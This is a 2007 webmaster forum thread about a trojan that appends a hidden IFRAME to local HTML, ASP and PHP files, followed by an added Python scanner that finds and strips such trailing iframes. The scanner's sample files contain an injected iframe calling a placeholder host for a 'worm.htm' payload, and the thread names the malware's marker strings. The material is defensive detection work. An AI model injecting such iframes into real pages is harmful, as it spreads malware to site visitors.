Virus / Spyware Edits HTML Files

Sites may be helping spread bug...

lexipixel

6:44 am on Feb 22, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Just ran across a virus / spyware threat that could cause web developers / webmasters to unknowingly spread "something"...

The scenario is your development machine gets infected and you upload files to a webserver and spread it...

Yes, the malicious code gets appended to HTML files.

The bug appends an IFRAME tag to all .HTM, .HTML, .ASP, and .PHP files on an infected PC, (and possibly other text files containing markup or scripting language).

The IFRAME tag is added to the end of every file.

I would check any PC that tested positive for any trojan/worm/virus recently --- even if you cleaned the virus, the infected web pages were most likely not cleaned, (no major anti-virus / spyware company appears to have info on this exploit/virus).

Use Search Files/Folders utility with option to search for text within files.

search for: <snip>

NOTE: searching G for the same term shows 236 results, most not in English..

[edited by: trillianjedi at 3:24 pm (utc) on Feb. 22, 2007]
[edit reason] See below [/edit]

rocknbil

9:24 am on Feb 22, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



Wouldn't this reveal itself in view source?

rokec

3:07 pm on Feb 22, 2007 (gmt 0)

10+ Year Member



Sure, you can see everything with notepad or similar editor.

trillianjedi

3:26 pm on Feb 22, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



Let's not post any URLs please where the page pointed to may contain a virus/spyware/trojan etc.

Not everyone here has English as a first language - people may unwittingly drop that URL into a web browser.

Did you discover this one lexipixel or is it referenced on a security related website somewhere?

lexipixel

9:01 am on Feb 23, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



rocknbil: yeah, you can do a view source on a file and look for the IFRAME at the very end of the file. The reason I suggested doing a search (include all drives and subdirectories) is that the HTML files could have been infected on another machine and downloaded. In this case every file on the machine will not be affected, just the ones you've downloaded, (or in the case of a webserver, just the files that were uploaded to it).

To be clear:

The HTML, PHP and ASP files are corrupted by a trojan on an end user's machine. The danger is that the [person/user/web developer] could then upload the corrupted files to a live server, helping to spread the worm. The worm will not spread from file to file on the server (so it would be hit or miss just viewing source on a couple files on a server -- I would search all drives).

trillianjedi:
I didn't discover it -- I just seem to be the only one wondering about it.

I found the corrupted files on one of my kids' machines after a virus clean up, (they didn't tell me until it was near dead from spawned processes: "Dad, the computer is running real slow and acting weird -- it's been getting worse and worse for a couple days").

For clean ups, I usually go in and do a search by descending date order to find the most recently modified files.

I noticed a batch of .HTML files all with the same recent date that should not have been modified at all and opened one... Found the IFRAME code at the end just cause it looked out of place after the </HTML> tag. I opened a few more and found the same, then searched the entire machine to find every file had it --- next stop Google and found a few references --- but only 2-3 in English that other people had found the same thing. Most of the rest are Chinese or Japanese posts -- I did online translation for the one from Symantec..

I posted about it in the AVG support forum (at GriSoft, that machine uses their AVG anti virus software)...Nobody ever heard of it there.

You could just search for files that contain the string "krvkr" within the text. A variant uses the same IFRAME exploit but another URL with "lovebak" in place of the "krvkr". Both reference the same "worm.htm" file.

It may be related or a side effect of Fujacks or Realor virus, but I am not really sure... I just see those names popping up in the Chinese translations.
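The check lexipixel describes in the two posts above (an IFRAME appended after the closing </HTML> of .HTM/.HTML/.ASP/.PHP files, found by searching every drive and by sorting on modification date) can be scripted so a developer runs it over a working copy or an uploaded site before anything goes live. The following scanner is an added example, not code from this thread or from any vendor; the sample files it writes into a temporary directory are constructed, and the hostname malicious.example is a placeholder standing in for whatever URL the injected tag pointed at. It flags only markup that sits after the last </html>, which is where the thread says the injection lands and where legitimate markup never lives, so an iframe used inside a page body is not reported.

```python
import os
import re
import tempfile
from datetime import datetime

# File extensions the thread reports being touched on the infected PC.
WEB_EXTENSIONS = {".htm", ".html", ".asp", ".php"}

# Closing </html> tag, an <iframe ...> opening tag, and a whole iframe element.
CLOSING_HTML = re.compile(rb"</html\s*>", re.IGNORECASE)
IFRAME_TAG = re.compile(rb"<iframe\b[^>]*>", re.IGNORECASE)
IFRAME_ELEMENT = re.compile(rb"<iframe\b[^>]*>(?:.*?</iframe\s*>)?", re.IGNORECASE | re.DOTALL)


def trailing_iframes(data: bytes):
    """Return the <iframe> opening tags found after the LAST </html> in `data`.

    Legitimate markup does not follow the closing </html>, so anything there is
    suspicious; iframes inside the document body are deliberately ignored."""
    matches = list(CLOSING_HTML.finditer(data))
    if not matches:
        return []
    tail = data[matches[-1].end():]
    return [m.group(0).decode("latin-1") for m in IFRAME_TAG.finditer(tail)]


def strip_trailing_iframes(data: bytes) -> bytes:
    """Return `data` with iframe elements removed from the part after </html>.

    Only the tail is touched; run this on files a human has confirmed as injected."""
    matches = list(CLOSING_HTML.finditer(data))
    if not matches:
        return data
    cut = matches[-1].end()
    return data[:cut] + IFRAME_ELEMENT.sub(b"", data[cut:])


def scan_tree(root):
    """Walk `root`, inspect every web file, and return findings newest-first.

    Each finding is (mtime_iso, path, [iframe tags]); sorting on modification
    time mirrors the 'descending date order' triage described in the thread."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in WEB_EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            tags = trailing_iframes(data)
            if tags:
                mtime = datetime.fromtimestamp(os.path.getmtime(path)).isoformat(timespec="seconds")
                findings.append((mtime, path, tags))
    findings.sort(reverse=True)
    return findings


def build_sample_tree(root):
    """Write constructed sample files (not taken from the thread) under `root`."""
    clean = b"<html><body><p>hello</p></body></html>\n"
    # Placeholder host; the real URL from the thread is intentionally not used.
    injected = clean + b'<iframe src="http://malicious.example/worm.htm" width=0 height=0></iframe>\n'
    samples = {
        "index.html": clean,                                   # untouched page
        "about.htm": injected,                                 # injected tail
        "sub/page.php": b"<?php echo 'x'; ?>\n" + injected,    # nested dir, PHP
        "notes.txt": injected,                                 # not a web extension: skipped
        "upper.HTML": b"<HTML><BODY>x</BODY></HTML><IFRAME SRC=\"http://malicious.example/worm.htm\"></IFRAME>",
    }
    for rel, body in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(body)
    return samples


def demo():
    """Build the sample tree in a temp dir, scan it, and return (relative path, tags)
    pairs sorted by path so the result is stable regardless of file timestamps."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        findings = scan_tree(root)
        return sorted((os.path.relpath(p, root).replace(os.sep, "/"), tags)
                      for _, p, tags in findings)


if __name__ == "__main__":
    for rel, tags in demo():
        print(f"{rel}: {tags}")
```

Point `scan_tree` at a site root or a whole drive to reproduce the "search all drives and subdirectories" step; a clean tree returns an empty list. `strip_trailing_iframes` exists so that a confirmed batch can be cleaned in place, but because the thread notes that the files are re-uploaded from a developer's machine, the more important control is to re-scan the local working copy after the machine itself has been cleaned, before the next deploy.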